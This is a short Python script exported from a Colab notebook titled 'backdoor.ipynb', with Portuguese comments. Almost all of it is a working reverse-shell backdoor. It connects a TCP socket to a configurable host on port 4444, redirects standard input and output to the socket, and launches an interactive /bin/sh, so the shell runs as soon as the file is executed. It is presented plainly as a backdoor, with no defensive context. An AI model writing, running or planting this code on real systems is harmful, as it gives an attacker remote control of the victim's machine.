# -*- coding: utf-8 -*-
"""backdoor.ipynb

Automatically generated by Colab.

Original file is located at
    https://colab.research.google.com/drive/1obQ_obTeaia79hwcBXsUXmWwdEwVzDK-
"""

import socket, subprocess, os

HOST = '127.0.0.1' # Seu endereço IP local
PORT = 4444 # Porta para conexão

def backdoor():
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((HOST, PORT))
        os.dup2(s.fileno(), 0)
        os.dup2(s.fileno(), 1)
        os.dup2(s.fileno(), 2)
        p = subprocess.call(["/bin/sh", "-i"]) # Abre um shell interativo
    except Exception as e:
        print(f"Erro: {e}")
        s.close()

backdoor()
